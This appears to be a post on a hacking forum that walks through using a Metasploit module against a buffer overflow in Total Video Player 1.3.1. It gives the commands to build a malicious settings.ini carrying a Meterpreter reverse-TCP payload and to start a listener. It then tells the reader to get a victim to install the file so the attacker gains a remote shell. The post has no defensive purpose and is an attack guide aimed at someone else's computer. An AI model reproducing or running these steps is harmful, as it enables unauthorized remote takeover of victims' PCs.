• We just launched and are currently in beta. Join us as we build and grow the community.

Hack Remote Windows PC using Total Video Player 1.3.1 Buffer Overflow

Moutarde

Revenue Analysis Ninja
M Rep
0
0
0
Rep
0
M Vouches
0
0
0
Vouches
0
Posts
146
Likes
88
Bits
2 MONTHS
2 2 MONTHS OF SERVICE
LEVEL 1 300 XP
This Metasploit module exploits a buffer overflow in Total Video Player 1.3.1. The vulnerability occurs opening malformed Settings.ini file e.g.”C:\Program Files\Total Video Player\”. This Metasploit module has been tested successfully over Windows WinXp-Sp3-EN, Windows 7, and Windows 8.

Exploit Targets

Total Video Player 1.3.1

Windows XP

Windows 7

Windows 8

Requirement

Attacker: kali Linux

Victim PC: Windows XP SP 3

Open Kali terminal type msfconsole

1.png


Now type use exploit/windows/fileformat/total_video_player_ini_bof

msf exploit (total_video_player_ini_bof)>set payload windows/meterpreter/reverse_tcp

msf exploit (total_video_player_ini_bof)>set lhost 192.168.1.7 (IP of Local Host)

msf exploit (total_video_player_ini_bof)>exploit

2.png


After we successfully generate the malicious settings.ini File, it will stored on your local computer

/root/.msf4/local/settings.ini

3.png


Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.1.7

exploit

Now send your settings.ini files to victim, as soon as they download and replace with settings.ini file in C:\Program Files\Total Video Player\”. Now start video player now you can access meterpreter shell on victim computer

4.png


5.png
 

437,153

314,794

314,803

Top